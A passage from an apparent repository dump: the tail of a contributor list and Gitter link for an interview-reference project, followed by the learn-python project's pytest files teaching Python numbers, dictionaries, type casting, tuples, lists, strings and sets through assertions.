src="https://avatars3.githubusercontent.com/u/3371163?s=400&v=4" width="40px"> </a> <a href="https://github.com/jiaoqiyuan"> <img src="https://avatars3.githubusercontent.com/u/13357933?s=400&v=4" width="40px"> </a> <a href="https://github.com/seniorcandy"> <img src="https://avatars1.githubusercontent.com/u/11422477?s=400&v=4" width="40px"> </a> <a href="https://github.com/kphn"> <img src="https://avatars1.githubusercontent.com/u/35964821?s=400&v=4" width="40px"> </a> <a href="https://github.com/OhIAmFine"> <img src="https://avatars0.githubusercontent.com/u/10390004?s=400&v=4" width="40px"> </a> <a href="https://github.com/ArtarisCN"> <img src="https://avatars2.githubusercontent.com/u/19167403?s=400&v=4" width="40px"> </a> <a href="https://github.com/Octobug"> <img src="https://avatars1.githubusercontent.com/u/8007022?s=400&v=4" width="40px"> </a> <a href="https://github.com/SenZhangAI"> <img src="https://avatars0.githubusercontent.com/u/8464676?s=400&v=4" width="40px"> </a> <a href="https://github.com/wansho"> <img src="https://avatars2.githubusercontent.com/u/28779244?s=400&v=4" width="40px"> </a> <a href="https://github.com/dengchaoyun007"> <img src="https://avatars1.githubusercontent.com/u/38239467?s=400&v=4" width="40px"> </a> <a href="https://github.com/FanShikun"> <img src="https://avatars1.githubusercontent.com/u/30170514?s=400&v=4" width="40px"> </a> <a href="https://github.com/Carmon-Lee"> <img src="https://avatars3.githubusercontent.com/u/29457756?s=400&v=4" width="40px"> </a> <a href="https://github.com/gytHW"> <img src="https://avatars3.githubusercontent.com/u/13961667?s=400&v=4" width="40px"> </a> <a href="https://github.com/keytouch"> <img src="https://avatars0.githubusercontent.com/u/20770013?s=400&v=4" width="40px"> </a> <a href="https://github.com/SJshenjian"> <img src="https://avatars0.githubusercontent.com/u/25132537?s=400&v=4" width="40px"> </a> <a href="https://github.com/likunyao"> <img src="https://avatars3.githubusercontent.com/u/16969814?s=400&v=4" width="40px"> </a> <tr> <a href="https://github.com/xiepeiyang"> <img src="https://avatars0.githubusercontent.com/u/8435589?s=400&v=4" width="40px"> </a> <a href="https://github.com/fnlearner"> <img src="https://avatars3.githubusercontent.com/u/38586156?s=400&v=4" width="40px"> </a> <a href="https://github.com/Macyrate"> <img src="https://avatars2.githubusercontent.com/u/20154121?s=400&v=4" width="40px"> </a> <a href="https://github.com/63isOK"> <img src="https://avatars2.githubusercontent.com/u/45553405?s=400&v=4" width="40px"> </a> <a href="https://github.com/Innei"> <img src="https://avatars3.githubusercontent.com/u/41265413?s=400&v=4" width="40px"> </a> <a href="https://github.com/EvanLeung08"> <img src="https://avatars0.githubusercontent.com/u/9621088?s=400&v=4" width="40px"> </a> <a href="https://github.com/yttsam"> <img src="https://avatars0.githubusercontent.com/u/51710251?s=400&v=4" width="40px"> </a> <br> <br> ## 加入 gitter 讨论组 https://gitter.im/im0voice/interview_internal_reference
learn-python
52c3a655cc2efd5ac01004f6f529c3262812a84e
File: src/data_types/test_numbers.py """Numbers. @see: https://docs.python.org/3/tutorial/introduction.html @see: https://www.w3schools.com/python/python_numbers.asp There are three numeric types in Python: - int (e.g. 2, 4, 20) - bool (e.g. False and True, acting like 0 and 1) - float (e.g. 5.0, 1.6) - complex (e.g. 5+6j, 4-3j) """ def test_integer_numbers(): """Integer type Int, or integer, is a whole number, positive or negative, without decimals, of unlimited length. """ positive_integer = 1 negative_integer = -3255522 big_integer = 35656222554887711 assert isinstance(positive_integer, int) assert isinstance(negative_integer, int) assert isinstance(big_integer, int) def test_booleans(): """Boolean Booleans represent the truth values False and True. The two objects representing the values False and True are the only Boolean objects. The Boolean type is a subtype of the integer type, and Boolean values behave like the values 0 and 1, respectively, in almost all contexts, the exception being that when converted to a string, the strings "False" or "True" are returned, respectively. """ true_boolean = True false_boolean = False assert true_boolean assert not false_boolean assert isinstance(true_boolean, bool) assert isinstance(false_boolean, bool) # Let's try to cast boolean to string. assert str(true_boolean) == "True" assert str(false_boolean) == "False" def test_float_numbers(): """Float type Float, or "floating point number" is a number, positive or negative, containing one or more decimals. """ float_number = 7.0 # Another way of declaring float is using float() function. float_number_via_function = float(7) float_negative = -35.59 assert float_number == float_number_via_function assert isinstance(float_number, float) assert isinstance(float_number_via_function, float) assert isinstance(float_negative, float) # Float can also be scientific numbers with an "e" to indicate # the power of 10. float_with_small_e = 35e3 float_with_big_e = 12E4 assert float_with_small_e == 35000 assert float_with_big_e == 120000 assert isinstance(12E4, float) assert isinstance(-87.7e100, float) def test_complex_numbers(): """Complex Type""" complex_number_1 = 5 + 6j complex_number_2 = 3 - 2j assert isinstance(complex_number_1, complex) assert isinstance(complex_number_2, complex) assert complex_number_1 * complex_number_2 == 27 + 8j def test_number_operators(): """Basic operations""" # Addition. assert 2 + 4 == 6 # Multiplication. assert 2 * 4 == 8 # Division always returns a floating point number. assert 12 / 3 == 4.0 assert 12 / 5 == 2.4 assert 17 / 3 == 5.666666666666667 # Modulo operator returns the remainder of the division. assert 12 % 3 == 0 assert 13 % 3 == 1 # Floor division discards the fractional part. assert 17 // 3 == 5 # Raising the number to specific power. assert 5 ** 2 == 25 # 5 squared assert 2 ** 7 == 128 # 2 to the power of 7 # There is full support for floating point; operators with # mixed type operands convert the integer operand to floating point. assert 4 * 3.75 - 1 == 14.0 File: src/data_types/test_dictionaries.py """Dictionaries. @see: https://docs.python.org/3/tutorial/datastructures.html#dictionaries @see: https://www.w3schools.com/python/python_dictionaries.asp A dictionary is a collection which is unordered, changeable and indexed. In Python dictionaries are written with curly brackets, and they have keys and values. Dictionaries are sometimes found in other languages as “associative memories” or “associative arrays”. 
Unlike sequences, which are indexed by a range of numbers, dictionaries are indexed by keys, which can be any immutable type; strings and numbers can always be keys. Tuples can be used as keys if they contain only strings, numbers, or tuples; if a tuple contains any mutable object either directly or indirectly, it cannot be used as a key. You can’t use lists as keys, since lists can be modified in place using index assignments, slice assignments, or methods like append() and extend(). It is best to think of a dictionary as a set of key: value pairs, with the requirement that the keys are unique (within one dictionary). A pair of braces creates an empty dictionary: {}. Placing a comma-separated list of key:value pairs within the braces adds initial key:value pairs to the dictionary; this is also the way dictionaries are written on output. """ def test_dictionary(): """Dictionary""" fruits_dictionary = { 'cherry': 'red', 'apple': 'green', 'banana': 'yellow', } assert isinstance(fruits_dictionary, dict) # You may access set elements by keys. assert fruits_dictionary['apple'] == 'green' assert fruits_dictionary['banana'] == 'yellow' assert fruits_dictionary['cherry'] == 'red' # To check whether a single key is in the dictionary, use the in keyword. assert 'apple' in fruits_dictionary assert 'pineapple' not in fruits_dictionary # Change the apple color to "red". fruits_dictionary['apple'] = 'red' # Add new key/value pair to the dictionary fruits_dictionary['pineapple'] = 'yellow' assert fruits_dictionary['pineapple'] == 'yellow' # Performing list(d) on a dictionary returns a list of all the keys used in the dictionary, # in insertion order (if you want it sorted, just use sorted(d) instead). assert list(fruits_dictionary) == ['cherry', 'apple', 'banana', 'pineapple'] assert sorted(fruits_dictionary) == ['apple', 'banana', 'cherry', 'pineapple'] # It is also possible to delete a key:value pair with del. del fruits_dictionary['pineapple'] assert list(fruits_dictionary) == ['cherry', 'apple', 'banana'] # The dict() constructor builds dictionaries directly from sequences of key-value pairs. dictionary_via_constructor = dict([('sape', 4139), ('guido', 4127), ('jack', 4098)]) assert dictionary_via_constructor['sape'] == 4139 assert dictionary_via_constructor['guido'] == 4127 assert dictionary_via_constructor['jack'] == 4098 # In addition, dict comprehensions can be used to create dictionaries from arbitrary key # and value expressions: dictionary_via_expression = {x: x**2 for x in (2, 4, 6)} assert dictionary_via_expression[2] == 4 assert dictionary_via_expression[4] == 16 assert dictionary_via_expression[6] == 36 # When the keys are simple strings, it is sometimes easier to specify pairs using # keyword arguments. dictionary_for_string_keys = dict(sape=4139, guido=4127, jack=4098) assert dictionary_for_string_keys['sape'] == 4139 assert dictionary_for_string_keys['guido'] == 4127 assert dictionary_for_string_keys['jack'] == 4098 File: src/data_types/test_type_casting.py """Type casting. @see: https://www.w3schools.com/python/python_casting.asp There may be times when you want to specify a type on to a variable. This can be done with casting. Python is an object-orientated language, and as such it uses classes to define data types, including its primitive types. 
Casting in python is therefore done using constructor functions: - int() - constructs an integer number from an integer literal, a float literal (by rounding down to the previous whole number) literal, or a string literal (providing the string represents a whole number) - float() - constructs a float number from an integer literal, a float literal or a string literal (providing the string represents a float or an integer) - str() - constructs a string from a wide variety of data types, including strings, integer literals and float literals """ def test_type_casting_to_integer(): """Type casting to integer""" assert int(1) == 1 assert int(2.8) == 2 assert int('3') == 3 def test_type_casting_to_float(): """Type casting to float""" assert float(1) == 1.0 assert float(2.8) == 2.8 assert float("3") == 3.0 assert float("4.2") == 4.2 def test_type_casting_to_string(): """Type casting to string""" assert str("s1") == 's1' assert str(2) == '2' assert str(3.0) == '3.0' File: src/data_types/test_tuples.py """Tuples. @see: https://www.w3schools.com/python/python_tuples.asp @see: https://docs.python.org/3/tutorial/datastructures.html#tuples-and-sequences A tuple is a collection which is ordered and unchangeable. In Python tuples are written with round brackets. The Tuples have following properties: - You cannot change values in a tuple. - You cannot remove items in a tuple. """ import pytest def test_tuples(): """Tuples""" fruits_tuple = ("apple", "banana", "cherry") assert isinstance(fruits_tuple, tuple) assert fruits_tuple[0] == "apple" assert fruits_tuple[1] == "banana" assert fruits_tuple[2] == "cherry" # You cannot change values in a tuple. with pytest.raises(Exception): # pylint: disable=unsupported-assignment-operation fruits_tuple[0] = "pineapple" # It is also possible to use the tuple() constructor to make a tuple (note the double # round-brackets). # The len() function returns the length of the tuple. fruits_tuple_via_constructor = tuple(("apple", "banana", "cherry")) assert isinstance(fruits_tuple_via_constructor, tuple) assert len(fruits_tuple_via_constructor) == 3 # It is also possible to omit brackets when initializing tuples. another_tuple = 12345, 54321, 'hello!' assert another_tuple == (12345, 54321, 'hello!') # Tuples may be nested: nested_tuple = another_tuple, (1, 2, 3, 4, 5) assert nested_tuple == ((12345, 54321, 'hello!'), (1, 2, 3, 4, 5)) # As you see, on output tuples are always enclosed in parentheses, so that nested tuples are # interpreted correctly; they may be input with or without surrounding parentheses, although # often parentheses are necessary anyway (if the tuple is part of a larger expression). It is # not possible to assign to the individual items of a tuple, however it is possible to create # tuples which contain mutable objects, such as lists. # A special problem is the construction of tuples containing 0 or 1 items: the syntax has some # extra quirks to accommodate these. Empty tuples are constructed by an empty pair of # parentheses; a tuple with one item is constructed by following a value with a comma (it is # not sufficient to enclose a single value in parentheses). Ugly, but effective. For example: empty_tuple = () # pylint: disable=len-as-condition assert len(empty_tuple) == 0 # pylint: disable=trailing-comma-tuple singleton_tuple = 'hello', # <-- note trailing comma assert len(singleton_tuple) == 1 assert singleton_tuple == ('hello',) # The following example is called tuple packing: packed_tuple = 12345, 54321, 'hello!' 
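    # (Illustrative addition, assuming the `packed_tuple` defined just above.)
    # Packing simply builds an ordinary tuple object:
    assert isinstance(packed_tuple, tuple)
    assert packed_tuple == (12345, 54321, 'hello!')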
# The reverse operation is also possible. first_tuple_number, second_tuple_number, third_tuple_string = packed_tuple assert first_tuple_number == 12345 assert second_tuple_number == 54321 assert third_tuple_string == 'hello!' # This is called, appropriately enough, sequence unpacking and works for any sequence on the # right-hand side. Sequence unpacking requires that there are as many variables on the left # side of the equals sign as there are elements in the sequence. Note that multiple assignment # is really just a combination of tuple packing and sequence unpacking. # Swapping using tuples. # Data can be swapped from one variable to another in python using # tuples. This eliminates the need to use a 'temp' variable. first_number = 123 second_number = 456 first_number, second_number = second_number, first_number assert first_number == 456 assert second_number == 123 File: src/data_types/test_lists.py """Lists. # @see: https://www.learnpython.org/en/Lists # @see: https://docs.python.org/3/tutorial/introduction.html # @ee: https://docs.python.org/3/tutorial/datastructures.html#more-on-lists Python knows a number of compound data types, used to group together other values. The most versatile is the list, which can be written as a list of comma-separated values (items) between square brackets. Lists might contain items of different types, but usually the items all have the same type. """ import pytest def test_list_type(): """List type.""" # Lists are very similar to arrays. They can contain any type of variable, and they can contain # as many variables as you wish. Lists can also be iterated over in a very simple manner. # Here is an example of how to build a list. squares = [1, 4, 9, 16, 25] assert isinstance(squares, list) # Like strings (and all other built-in sequence type), lists can be # indexed and sliced: assert squares[0] == 1 # indexing returns the item assert squares[-1] == 25 assert squares[-3:] == [9, 16, 25] # slicing returns a new list # All slice operations return a new list containing the requested elements. # This means that the following slice returns a new (shallow) copy of # the list: assert squares[:] == [1, 4, 9, 16, 25] # Lists also support operations like concatenation: assert squares + [36, 49, 64, 81, 100] == [1, 4, 9, 16, 25, 36, 49, 64, 81, 100] # Unlike strings, which are immutable, lists are a mutable type, i.e. it # is possible to change their content: cubes = [1, 8, 27, 65, 125] # something's wrong here, the cube of 4 is 64! 
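    # (Illustrative addition, assuming the `cubes` list defined just above.)
    # The misplaced value can be located first, e.g. with list.index():
    assert cubes.index(65) == 3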
cubes[3] = 64 # replace the wrong value assert cubes == [1, 8, 27, 64, 125] # You can also add new items at the end of the list, by using # the append() method cubes.append(216) # add the cube of 6 cubes.append(7 ** 3) # and the cube of 7 assert cubes == [1, 8, 27, 64, 125, 216, 343] # Assignment to slices is also possible, and this can even change the size # of the list or clear it entirely: letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g'] letters[2:5] = ['C', 'D', 'E'] # replace some values assert letters == ['a', 'b', 'C', 'D', 'E', 'f', 'g'] letters[2:5] = [] # now remove them assert letters == ['a', 'b', 'f', 'g'] # clear the list by replacing all the elements with an empty list letters[:] = [] assert letters == [] # The built-in function len() also applies to lists letters = ['a', 'b', 'c', 'd'] assert len(letters) == 4 # It is possible to nest lists (create lists containing other lists), # for example: list_of_chars = ['a', 'b', 'c'] list_of_numbers = [1, 2, 3] mixed_list = [list_of_chars, list_of_numbers] assert mixed_list == [['a', 'b', 'c'], [1, 2, 3]] assert mixed_list[0] == ['a', 'b', 'c'] assert mixed_list[0][1] == 'b' def test_list_methods(): """Test list methods.""" fruits = ['orange', 'apple', 'pear', 'banana', 'kiwi', 'apple', 'banana'] # list.append(x) # Add an item to the end of the list. # Equivalent to a[len(a):] = [x]. fruits.append('grape') assert fruits == ['orange', 'apple', 'pear', 'banana', 'kiwi', 'apple', 'banana', 'grape'] # list.remove(x) # Remove the first item from the list whose value is equal to x. # It raises a ValueError if there is no such item. fruits.remove('grape') assert fruits == ['orange', 'apple', 'pear', 'banana', 'kiwi', 'apple', 'banana'] with pytest.raises(Exception): fruits.remove('not existing element') # list.insert(i, x) # Insert an item at a given position. The first argument is the index of the element # before which to insert, so a.insert(0, x) inserts at the front of the list, # and a.insert(len(a), x) is equivalent to a.append(x). fruits.insert(0, 'grape') assert fruits == ['grape', 'orange', 'apple', 'pear', 'banana', 'kiwi', 'apple', 'banana'] # list.index(x[, start[, end]]) # Return zero-based index in the list of the first item whose value is equal to x. # Raises a ValueError if there is no such item. # The optional arguments start and end are interpreted as in the slice notation and are used # to limit the search to a particular subsequence of the list. The returned index is computed # relative to the beginning of the full sequence rather than the start argument. assert fruits.index('grape') == 0 assert fruits.index('orange') == 1 assert fruits.index('banana') == 4 assert fruits.index('banana', 5) == 7 # Find next banana starting a position 5 with pytest.raises(Exception): fruits.index('not existing element') # list.count(x) # Return the number of times x appears in the list. assert fruits.count('tangerine') == 0 assert fruits.count('banana') == 2 # list.copy() # Return a shallow copy of the list. Equivalent to a[:]. fruits_copy = fruits.copy() assert fruits_copy == ['grape', 'orange', 'apple', 'pear', 'banana', 'kiwi', 'apple', 'banana'] # list.reverse() # Reverse the elements of the list in place. fruits_copy.reverse() assert fruits_copy == [ 'banana', 'apple', 'kiwi', 'banana', 'pear', 'apple', 'orange', 'grape', ] # list.sort(key=None, reverse=False) # Sort the items of the list in place (the arguments can be used for sort customization, # see sorted() for their explanation). 
fruits_copy.sort() assert fruits_copy == [ 'apple', 'apple', 'banana', 'banana', 'grape', 'kiwi', 'orange', 'pear', ] # list.pop([i]) # Remove the item at the given position in the list, and return it. If no index is specified, # a.pop() removes and returns the last item in the list. (The square brackets around the i in # the method signature denote that the parameter is optional, not that you should type square # brackets at that position.) assert fruits == ['grape', 'orange', 'apple', 'pear', 'banana', 'kiwi', 'apple', 'banana'] assert fruits.pop() == 'banana' assert fruits == ['grape', 'orange', 'apple', 'pear', 'banana', 'kiwi', 'apple'] # list.clear() # Remove all items from the list. Equivalent to del a[:]. fruits.clear() assert fruits == [] def test_del_statement(): """The del statement There is a way to remove an item from a list given its index instead of its value: the del statement. This differs from the pop() method which returns a value. The del statement can also be used to remove slices from a list or clear the entire list (which we did earlier by assignment of an empty list to the slice). """ numbers = [-1, 1, 66.25, 333, 333, 1234.5] del numbers[0] assert numbers == [1, 66.25, 333, 333, 1234.5] del numbers[2:4] assert numbers == [1, 66.25, 1234.5] del numbers[:] assert numbers == [] # del can also be used to delete entire variables: del numbers with pytest.raises(Exception): # Referencing the name a hereafter is an error (at least until another # value is assigned to it). assert numbers == [] # noqa: F821 def test_list_comprehensions(): """List Comprehensions. List comprehensions provide a concise way to create lists. Common applications are to make new lists where each element is the result of some operations applied to each member of another sequence or iterable, or to create a subsequence of those elements that satisfy a certain condition. A list comprehension consists of brackets containing an expression followed by a for clause, then zero or more for or if clauses. The result will be a new list resulting from evaluating the expression in the context of the for and if clauses which follow it. """ # For example, assume we want to create a list of squares, like: squares = [] for number in range(10): squares.append(number ** 2) assert squares == [0, 1, 4, 9, 16, 25, 36, 49, 64, 81] # Note that this creates (or overwrites) a variable named "number" that still exists after # the loop completes. We can calculate the list of squares without any side effects using: squares = list(map(lambda x: x ** 2, range(10))) assert squares == [0, 1, 4, 9, 16, 25, 36, 49, 64, 81] # or, equivalently (which is more concise and readable): squares = [x ** 2 for x in range(10)] assert squares == [0, 1, 4, 9, 16, 25, 36, 49, 64, 81] # For example, this listcomp combines the elements of two lists if they are not equal. combinations = [(x, y) for x in [1, 2, 3] for y in [3, 1, 4] if x != y] assert combinations == [(1, 3), (1, 4), (2, 3), (2, 1), (2, 4), (3, 1), (3, 4)] # and it’s equivalent to: combinations = [] for first_number in [1, 2, 3]: for second_number in [3, 1, 4]: if first_number != second_number: combinations.append((first_number, second_number)) assert combinations == [(1, 3), (1, 4), (2, 3), (2, 1), (2, 4), (3, 1), (3, 4)] # Note how the order of the for and if statements is the same in both these snippets. # If the expression is a tuple (e.g. the (x, y) in the previous example), # it must be parenthesized. 
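    # (Added sketch of the parenthesization rule mentioned above.)
    # [(x, -x) for x in range(3)] is valid, while [x, -x for x in range(3)]
    # would raise a SyntaxError because the tuple expression is not parenthesized.
    assert [(x, -x) for x in range(3)] == [(0, 0), (1, -1), (2, -2)]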
# Let's see some more examples: vector = [-4, -2, 0, 2, 4] # Create a new list with the values doubled. doubled_vector = [x * 2 for x in vector] assert doubled_vector == [-8, -4, 0, 4, 8] # Filter the list to exclude negative numbers. positive_vector = [x for x in vector if x >= 0] assert positive_vector == [0, 2, 4] # Apply a function to all the elements. abs_vector = [abs(x) for x in vector] assert abs_vector == [4, 2, 0, 2, 4] # Call a method on each element. fresh_fruit = [' banana', ' loganberry ', 'passion fruit '] clean_fresh_fruit = [weapon.strip() for weapon in fresh_fruit] assert clean_fresh_fruit == ['banana', 'loganberry', 'passion fruit'] # Create a list of 2-tuples like (number, square). square_tuples = [(x, x ** 2) for x in range(6)] assert square_tuples == [(0, 0), (1, 1), (2, 4), (3, 9), (4, 16), (5, 25)] # Flatten a list using a listcomp with two 'for'. vector = [[1, 2, 3], [4, 5, 6], [7, 8, 9]] flatten_vector = [num for elem in vector for num in elem] assert flatten_vector == [1, 2, 3, 4, 5, 6, 7, 8, 9] def test_nested_list_comprehensions(): """Nested List Comprehensions The initial expression in a list comprehension can be any arbitrary expression, including another list comprehension. """ # Consider the following example of a 3x4 matrix implemented as a list of 3 lists of length 4: matrix = [ [1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12], ] # The following list comprehension will transpose rows and columns: transposed_matrix = [[row[i] for row in matrix] for i in range(4)] assert transposed_matrix == [ [1, 5, 9], [2, 6, 10], [3, 7, 11], [4, 8, 12], ] # As we saw in the previous section, the nested listcomp is evaluated in the context of the # for that follows it, so this example is equivalent to: transposed = [] for i in range(4): transposed.append([row[i] for row in matrix]) assert transposed == [ [1, 5, 9], [2, 6, 10], [3, 7, 11], [4, 8, 12], ] # which, in turn, is the same as: transposed = [] for i in range(4): # the following 3 lines implement the nested listcomp transposed_row = [] for row in matrix: transposed_row.append(row[i]) transposed.append(transposed_row) assert transposed == [ [1, 5, 9], [2, 6, 10], [3, 7, 11], [4, 8, 12], ] # In the real world, you should prefer built-in functions to complex flow statements. # The zip() function would do a great job for this use case: assert list(zip(*matrix)) == [ (1, 5, 9), (2, 6, 10), (3, 7, 11), (4, 8, 12), ] File: src/data_types/test_strings.py """Strings. @see: https://docs.python.org/3/tutorial/introduction.html @see: https://www.w3schools.com/python/python_strings.asp @see: https://www.w3schools.com/python/python_ref_string.asp Besides numbers, Python can also manipulate strings, which can be expressed in several ways. They can be enclosed in single quotes ('...') or double quotes ("...") with the same result. """ import pytest def test_string_type(): """String type""" # String with double quotes. name_1 = "John" # String with single quotes. name_2 = 'John' # Strings created with different kind of quotes are treated the same. assert name_1 == name_2 assert isinstance(name_1, str) assert isinstance(name_2, str) # \ can be used to escape quotes. # use \' to escape the single quote or use double quotes instead. single_quote_string = 'doesn\'t' double_quote_string = "doesn't" assert single_quote_string == double_quote_string # \n means newline. multiline_string = 'First line.\nSecond line.' # Without print(), \n is included in the output. # But with print(), \n produces a new line. 
assert multiline_string == 'First line.\nSecond line.' # Strings can be indexed, with the first character having index 0. # There is no separate character type; a character is simply a string # of size one. Note that since -0 is the same as 0, negative indices # start from -1. word = 'Python' assert word[0] == 'P' # First character. assert word[5] == 'n' # Fifth character. assert word[-1] == 'n' # Last character. assert word[-2] == 'o' # Second-last character. assert word[-6] == 'P' # Sixth from the end or zeroth from the beginning. assert isinstance(word[0], str) # In addition to indexing, slicing is also supported. While indexing is # used to obtain individual characters, slicing allows you to obtain # substring: assert word[0:2] == 'Py' # Characters from position 0 (included) to 2 (excluded). assert word[2:5] == 'tho' # Characters from position 2 (included) to 5 (excluded). # Note how the start is always included, and the end always excluded. # This makes sure that s[:i] + s[i:] is always equal to s: assert word[:2] + word[2:] == 'Python' assert word[:4] + word[4:] == 'Python' # Slice indices have useful defaults; an omitted first index defaults to # zero, an omitted second index defaults to the size of the string being # sliced. assert word[:2] == 'Py' # Character from the beginning to position 2 (excluded). assert word[4:] == 'on' # Characters from position 4 (included) to the end. assert word[-2:] == 'on' # Characters from the second-last (included) to the end. # One way to remember how slices work is to think of the indices as # pointing between characters, with the left edge of the first character # numbered 0. Then the right edge of the last character of a string of n # characters has index n, for example: # # +---+---+---+---+---+---+ # | P | y | t | h | o | n | # +---+---+---+---+---+---+ # 0 1 2 3 4 5 6 # -6 -5 -4 -3 -2 -1 # Attempting to use an index that is too large will result in an error. with pytest.raises(Exception): not_existing_character = word[42] assert not not_existing_character # However, out of range slice indexes are handled gracefully when used # for slicing: assert word[4:42] == 'on' assert word[42:] == '' # Python strings cannot be changed — they are immutable. Therefore, # assigning to an indexed position in the string # results in an error: with pytest.raises(Exception): # pylint: disable=unsupported-assignment-operation word[0] = 'J' # If you need a different string, you should create a new one: assert 'J' + word[1:] == 'Jython' assert word[:2] + 'py' == 'Pypy' # The built-in function len() returns the length of a string: characters = 'supercalifragilisticexpialidocious' assert len(characters) == 34 # String literals can span multiple lines. One way is using triple-quotes: """...""" # or '''...'''. End of lines are automatically included in the string, but it’s possible # to prevent this by adding a \ at the end of the line. The following example: multi_line_string = '''\ First line Second line ''' assert multi_line_string == '''\ First line Second line ''' def test_string_operators(): """Basic operations Strings can be concatenated (glued together) with the + operator, and repeated with *: 3 times 'un', followed by 'ium' """ assert 3 * 'un' + 'ium' == 'unununium' # 'Py' 'thon' python = 'Py' 'thon' assert python == 'Python' # This feature is particularly useful when you want to break long strings: text = ( 'Put several strings within parentheses ' 'to have them joined together.' 
) assert text == 'Put several strings within parentheses to have them joined together.' # If you want to concatenate variables or a variable and a literal, use +: prefix = 'Py' assert prefix + 'thon' == 'Python' def test_string_methods(): """String methods""" hello_world_string = "Hello, World!" # The strip() method removes any whitespace from the beginning or the end. string_with_whitespaces = " Hello, World! " assert string_with_whitespaces.strip() == "Hello, World!" # The len() method returns the length of a string. assert len(hello_world_string) == 13 # The lower() method returns the string in lower case. assert hello_world_string.lower() == 'hello, world!' # The upper() method returns the string in upper case. assert hello_world_string.upper() == 'HELLO, WORLD!' # The replace() method replaces a string with another string. assert hello_world_string.replace('H', 'J') == 'Jello, World!' # The split() method splits the string into substrings if it finds instances of the separator. assert hello_world_string.split(',') == ['Hello', ' World!'] # Converts the first character to upper case assert 'low letter at the beginning'.capitalize() == 'Low letter at the beginning' # Returns the number of times a specified value occurs in a string. assert 'low letter at the beginning'.count('t') == 4 # Searches the string for a specified value and returns the position of where it was found. assert 'Hello, welcome to my world'.find('welcome') == 7 # Converts the first character of each word to upper case assert 'Welcome to my world'.title() == 'Welcome To My World' # Returns a string where a specified value is replaced with a specified value. assert 'I like bananas'.replace('bananas', 'apples') == 'I like apples' # Joins the elements of an iterable to the end of the string. my_tuple = ('John', 'Peter', 'Vicky') assert ', '.join(my_tuple) == 'John, Peter, Vicky' # Returns True if all characters in the string are upper case. assert 'ABC'.isupper() assert not 'AbC'.isupper() # Check if all the characters in the text are letters. assert 'CompanyX'.isalpha() assert not 'Company 23'.isalpha() # Returns True if all characters in the string are decimals. assert '1234'.isdecimal() assert not 'a21453'.isdecimal() def test_string_formatting(): """String formatting. Often you’ll want more control over the formatting of your output than simply printing space-separated values. There are several ways to format output """ # To use formatted string literals, begin a string with f or F before the opening quotation # mark or triple quotation mark. Inside this string, you can write a Python expression # between { and } characters that can refer to variables or literal values. year = 2018 event = 'conference' assert f'Results of the {year} {event}' == 'Results of the 2018 conference' # The str.format() method of strings requires more manual effort. You’ll still use { and } to # mark where a variable will be substituted and can provide detailed formatting directives, # but you’ll also need to provide the information to be formatted. yes_votes = 42_572_654 # equivalent of 42572654 no_votes = 43_132_495 # equivalent of 43132495 percentage = yes_votes / (yes_votes + no_votes) assert '{:-9} YES votes {:2.2%}'.format(yes_votes, percentage) == ' 42572654 YES votes 49.67%' # When you don’t need fancy output but just want a quick display of some variables for debugging # purposes, you can convert any value to a string with the repr() or str() functions. 
The str() # function is meant to return representations of values which are fairly human-readable, while # repr() is meant to generate representations which can be read by the interpreter (or will # force a SyntaxError if there is no equivalent syntax). For objects which don’t have a # particular representation for human consumption, str() will return the same value as repr(). # Many values, such as numbers or structures like lists and dictionaries, have the same # representation using either function. Strings, in particular, have two distinct # representations. greeting = 'Hello, world.' first_num = 10 * 3.25 second_num = 200 * 200 assert str(greeting) == 'Hello, world.' assert repr(greeting) == "'Hello, world.'" assert str(1/7) == '0.14285714285714285' # The argument to repr() may be any Python object: assert repr((first_num, second_num, ('spam', 'eggs'))) == "(32.5, 40000, ('spam', 'eggs'))" # Formatted String Literals # Formatted string literals (also called f-strings for short) let you include the value of # Python expressions inside a string by prefixing the string with f or F and writing # expressions as {expression}. # An optional format specifier can follow the expression. This allows greater control over how # the value is formatted. The following example rounds pi to three places after the decimal. pi_value = 3.14159 assert f'The value of pi is {pi_value:.3f}.' == 'The value of pi is 3.142.' # Passing an integer after the ':' will cause that field to be a minimum number of characters # wide. This is useful for making columns line up: table_data = {'Sjoerd': 4127, 'Jack': 4098, 'Dcab': 7678} table_string = '' for name, phone in table_data.items(): table_string += f'{name:7}==>{phone:7d}' assert table_string == ('Sjoerd ==> 4127' 'Jack ==> 4098' 'Dcab ==> 7678') # The String format() Method # Basic usage of the str.format() method looks like this: assert 'We are {} who say "{}!"'.format('knights', 'Ni') == 'We are knights who say "Ni!"' # The brackets and characters within them (called format fields) are replaced with the objects # passed into the str.format() method. A number in the brackets can be used to refer to the # position of the object passed into the str.format() method assert '{0} and {1}'.format('spam', 'eggs') == 'spam and eggs' assert '{1} and {0}'.format('spam', 'eggs') == 'eggs and spam' # If keyword arguments are used in the str.format() method, their values are referred to by # using the name of the argument. formatted_string = 'This {food} is {adjective}.'.format( food='spam', adjective='absolutely horrible' ) assert formatted_string == 'This spam is absolutely horrible.' # Positional and keyword arguments can be arbitrarily combined formatted_string = 'The story of {0}, {1}, and {other}.'.format( 'Bill', 'Manfred', other='Georg' ) assert formatted_string == 'The story of Bill, Manfred, and Georg.' # If you have a really long format string that you don’t want to split up, it would be nice if # you could reference the variables to be formatted by name instead of by position. This can be # done by simply passing the dict and using square brackets '[]' to access the keys table = {'Sjoerd': 4127, 'Jack': 4098, 'Dcab': 8637678} formatted_string = 'Jack: {0[Jack]:d}; Sjoerd: {0[Sjoerd]:d}; Dcab: {0[Dcab]:d}'.format(table) assert formatted_string == 'Jack: 4098; Sjoerd: 4127; Dcab: 8637678' # This could also be done by passing the table as keyword arguments with the ‘**’ notation. 
formatted_string = 'Jack: {Jack:d}; Sjoerd: {Sjoerd:d}; Dcab: {Dcab:d}'.format(**table) assert formatted_string == 'Jack: 4098; Sjoerd: 4127; Dcab: 8637678' File: src/data_types/test_sets.py """Sets. @see: https://www.w3schools.com/python/python_sets.asp @see: https://docs.python.org/3.7/tutorial/datastructures.html#sets A set is a collection which is unordered and unindexed. In Python sets are written with curly brackets. Set objects also support mathematical operations like union, intersection, difference, and symmetric difference. """ def test_sets(): """Sets""" fruits_set = {"apple", "banana", "cherry"} assert isinstance(fruits_set, set) # It is also possible to use the set() constructor to make a set. # Note the double round-brackets fruits_set_via_constructor = set(("apple", "banana", "cherry")) assert isinstance(fruits_set_via_constructor, set) def test_set_methods(): """Set methods""" fruits_set = {"apple", "banana", "cherry"} # You may check if the item is in set by using "in" statement assert "apple" in fruits_set assert "pineapple" not in fruits_set # Use the len() method to return the number of items. assert len(fruits_set) == 3 # You can use the add() object method to add an item. 